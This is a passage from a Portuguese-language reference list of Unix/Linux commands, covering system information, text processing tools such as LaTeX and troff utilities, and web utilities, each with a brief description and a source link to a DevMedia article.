  • pwd: Mostra-nos o caminho por inteiro do diretório em que nos encontramos em dado momento, ou seja um pathname
  • set: Define variáveis da sessão, ou seja, da shell, na C shell, na bash ou na ksh
  • spend: Lista os custos ACITS UNIX até à data
  • time Mede o tempo de execução de programas
  • uptime: Diz-nos há quanto tempo o sistema está funcional, quando foi ligado e o seu uptime
  • w: Mostra-nos quem está no sistema ou que comando cada job está a executar
  • who: Mostra-nos quem está logado no sistema
  • whois: Serviço de diretório de domínios da Internet, permite-nos saber informações sobre determinados domínios na Internet, quando um domínio foi registado, quando expira, etc
  • whoami: Diz-nos quem é o dono da shell

 

Comandos de Processamento de Texto do linux

  • abiword: Processador de Texto Open Source
  • addbib: Cria ou modifica bases de dados bibliográficas
  • col: Reverte o filtro a line feeds
  • diction: Identifica sentenças com palavras
  • diffmk: Marca diferenças entre arquivos
  • dvips: Converte arquivos TeX DVI em arquivos PostScript
  • explain: Explica frases encontradas pelo programa diction
  • grap: Preprocessador pic para desenhar gráficos, usado em tarefas elementares de análises de dados
  • hyphen: Encontra palavras com hífens
  • ispell: Verifica a ortografia de forma interativa
  • latex: Formata texto em LaTeX, que é baseado no TeX
  • pdfelatex: Para documentos LaTeX em formato pdf
  • latex2html: Converter LaTeX para html
  • lookbib: Encontra referências bibliográficas
  • macref: Cria uma referência cruzada listando arquivos de macros nroff/troff
  • ndx: Cria uma página de indexação para um documento
  • neqn: Formata matemáticas com nroff
  • nroff: Formata texto para exibição simples
  • pic: Produz simples imagens para troff input
  • psdit: Filtra um output troff para a Apple LaserWriter
  • ptx: Cria uma indexação permutada mas não em CCWF
  • refer: Insere referências de bases de dados bibliográficas
  • roffbib: Faz o run off de uma base de dados bibliográfica
  • sortbib: Ordena uma base de dados bibliográfica
  • spell: Encontra erros de ortografia
  • style: Analisa as características superficiais de um documento
  • tbl: Formata tabelas para nroff/troff
  • tex: Formata texto
  • tpic: Converte arquivos pic source em comandos TeX
  • wget: Permite-nos fazer o download completo de páginas web, com todos os arquivos, de forma fácil e não interactiva, sem exigir por isso presença do utilizador, respeitando também o arquivorobots.txt

 

Web

  • html2ps: Conversor de html para ps
  • latex2html: Conversor de LaTeX para html
  • lynx: Navegador web baseado em modo de texto, ou seja, é um web browser que nos permite abrir todo o tipo de páginas visualizando apenas os textos elinks, não vendo assim as imagens, e sendo por isso bastante rápido, mas requere prática para ser manuseado
  • netscape: Navegador web da Netscape
  • sitecopy: Aplicação que nos permite manter fácil e remotamente web sites
  • weblint: Verificador de sintaxes e de estilos html

Fonte: http://www.devmedia.com.br/comandos-importantes-linux/23893